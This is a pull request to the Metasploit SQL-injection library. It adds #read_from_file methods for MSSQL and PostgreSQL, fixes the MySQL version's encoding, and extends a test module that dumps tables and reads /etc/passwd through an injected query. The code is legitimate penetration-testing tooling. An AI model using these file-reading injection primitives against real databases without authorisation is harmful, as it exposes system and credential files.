### PR TITLE
Add #read_from_file for MSSQL and PostgreSQL, fix the MySQL implementation

### DIFF
--- a/lib/msf/core/exploit/sqli/mssqli/common.rb
+++ b/lib/msf/core/exploit/sqli/mssqli/common.rb
@@ -192,6 +192,24 @@ module Msf::Exploit::SQLi::Mssqli
       run_sql("select '#{data}' into dumpfile '#{fpath}'")
     end
 
+    #
+    # Attempt reading from a file on the filesystem
+    # @param fpath [String] The path of the file to read
+    # @return [String] The content of the file if reading was successful
+    #
+    def read_from_file(fpath, binary=false)
+      alias1 = Rex::Text.rand_text_alpha(1) + Rex::Text.rand_text_alphanumeric(5..11)
+      expr = @encoder ? @encoder[:encode].sub(/\^DATA\^/, 'BulkColumn') : 'BulkColumn'
+      output = if @truncation_length
+        truncated_query("select substring(#{expr},^OFFSET^,#{@truncation_length}) " \
+        "from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
+      else
+        run_sql("select #{expr} from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
+      end
+      output = @encoder[:decode].call(output) if @encoder
+      output
+    end
+
     private
 
     #

--- a/lib/msf/core/exploit/sqli/mysqli/common.rb
+++ b/lib/msf/core/exploit/sqli/mysqli/common.rb
@@ -13,7 +13,7 @@ module Msf::Exploit::SQLi::MySQLi
     #
     ENCODERS = {
       base64: {
-        encode: 'to_base64(^DATA^)',
+        encode: 'replace(to_base64(^DATA^), \'\\n\', \'\')',
         decode: proc { |data| Base64.decode64(data) }
       },
       hex: {

--- a/lib/msf/core/exploit/sqli/mysqli/common.rb
+++ b/lib/msf/core/exploit/sqli/mysqli/common.rb
@@ -213,10 +213,11 @@ module Msf::Exploit::SQLi::MySQLi
     #
     # Attempt reading from a file on the filesystem, requires having the FILE privilege
     # @param fpath [String] The path of the file to read
+    # @param binary [Boolean] Whether the target file is a binary one or not
     # @return [String] The content of the file if reading was successful
     #
-    def read_from_file(fpath)
-      run_sql("select load_file('#{fpath}')")
+    def read_from_file(fpath, binary=false)
+      call_function("load_file('#{fpath}')")
     end
 
     private

--- a/lib/msf/core/exploit/sqli/postgresqli/common.rb
+++ b/lib/msf/core/exploit/sqli/postgresqli/common.rb
@@ -13,7 +13,7 @@ module Msf::Exploit::SQLi::PostgreSQLi
     #
     ENCODERS = {
       base64: {
-        encode: 'encode(^DATA^::bytea, \'base64\')',
+        encode: 'translate(encode(^DATA^::bytea, \'base64\'), E\'\n\',\'\')',
         decode: proc { |data| Base64.decode64(data) }
       },
       hex: {
@@ -200,6 +200,22 @@ module Msf::Exploit::SQLi::PostgreSQLi
     #
     def write_to_file(fname, data)
       raw_run_sql("copy (select '#{data}') to '#{fname}'")
+    end
+
+    #
+    # Attempt reading from a file on the filesystem
+    # @param fpath [String] The path of the file to read
+    # @param binary [String] Whether the target file should be considered a binary one (defaults to false)
+    # @return [String] The content of the file if reading was successful
+    #
+    def read_from_file(fpath, binary=false)
+      if binary
+        # pg_read_binary_file returns bytea
+        # an encoder might be needed
+        call_function("pg_read_binary_file('#{fpath}')")
+      else
+        call_function("pg_read_file('#{fpath}')")
+      end
     end
 
     private

--- a/test/modules/auxiliary/test/sqli_test.rb
+++ b/test/modules/auxiliary/test/sqli_test.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def boolean_blind
-    encoder = datastore['ENCODER']&.empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
     sqli = create_sqli(dbms: @dbms, opts: {
       encoder: encoder,
       hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def reflected
-    encoder = datastore['ENCODER']&.empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
     truncation = datastore['TRUNCATION_LENGTH'] <= 0 ? nil : datastore['TRUNCATION_LENGTH']
     sqli = create_sqli(dbms: @dbms, opts: {
       encoder: encoder,
@@ -69,19 +69,26 @@ class MetasploitModule < Msf::Auxiliary
     }) do |payload|
       sock = TCPSocket.open(datastore['RHOST'], datastore['RPORT'])
       sock.puts('0 union ' + payload)
-      res = sock.gets&.chomp
+      res = ""
+      begin
+        while true
+          res += sock.readline
+        end
+      rescue EOFError
+        vprint_status("Hit end of file...")
+      end
       sock.close
       truncation ? res[0, truncation] : res
     end
-    unless sqli.test_vulnerable
-      print_bad("Doesn't seem to be vulnerable")
-      return
-    end
+    #unless sqli.test_vulnerable
+    #  print_bad("Doesn't seem to be vulnerable")
+    #  return
+    #end
     perform_sqli(sqli)
   end
 
   def time_blind
-    encoder = datastore['ENCODER']&.empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
     sqli = create_sqli(dbms: @dbms, opts: {
       encoder: encoder,
       hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
@@ -109,15 +116,19 @@ class MetasploitModule < Msf::Auxiliary
   def perform_sqli(sqli)
     print_good "dbms version: #{sqli.version}"
     tables = sqli.enum_table_names
+    tables.map! { |table| table.strip }
     print_good "tables: #{tables.join(', ')}"
     tables.each do |table|
       columns = sqli.enum_table_columns(table)
+      columns.map! { |column| column.strip }
       print_good "#{table}(#{columns.join(', ')})"
       content = sqli.dump_table_fields(table, columns)
       content.each do |row|
         print_good "\t" + row.join(', ')
       end
     end
+    passwd_content = sqli.read_from_file('/etc/passwd')
+    print_good("Got #{passwd_content}")
   end
 
   def run

--- a/test/modules/auxiliary/test/sqli_test.rb
+++ b/test/modules/auxiliary/test/sqli_test.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def boolean_blind
-    encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER']&.empty? ? nil : datastore['ENCODER'].intern
     sqli = create_sqli(dbms: @dbms, opts: {
       encoder: encoder,
       hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def reflected
-    encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER']&.empty? ? nil : datastore['ENCODER'].intern
     truncation = datastore['TRUNCATION_LENGTH'] <= 0 ? nil : datastore['TRUNCATION_LENGTH']
     sqli = create_sqli(dbms: @dbms, opts: {
       encoder: encoder,
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def time_blind
-    encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER']&.empty? ? nil : datastore['ENCODER'].intern
     sqli = create_sqli(dbms: @dbms, opts: {
       encoder: encoder,
       hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],


### PR DESCRIPTION
This PR implements the method #read_from_file for PostgreSQL and MSSQL, and fixes the MySQL implementation

##  Details

### The added methods

The PostgreSQL method uses `pg_read_file` or `pg_read_binary_file` to read the file.

The MSSQL method uses the construct `select BulkColumn from openrowset(bulk N'/etc/passwd',SINGLE_CLOB) as Content`.

### The fix

The MySQL #read_from_file method now takes into consideration the encoder in use, and @truncation_query (it's possible to use it if the output of the query gets truncated, or if an encoder is required to get it to work).

##  Verification

For MySQL, don't forget to grant the FILE privilege to the user using the `load_file` function.

Just add something like the following to `test/modules/auxiliary/test/sqli_test.rb`

```ruby
passwd_content = sqli.read_from_file('/etc/passwd')
print_good("Got #{passwd_content}")
```

And test it with the different encoders.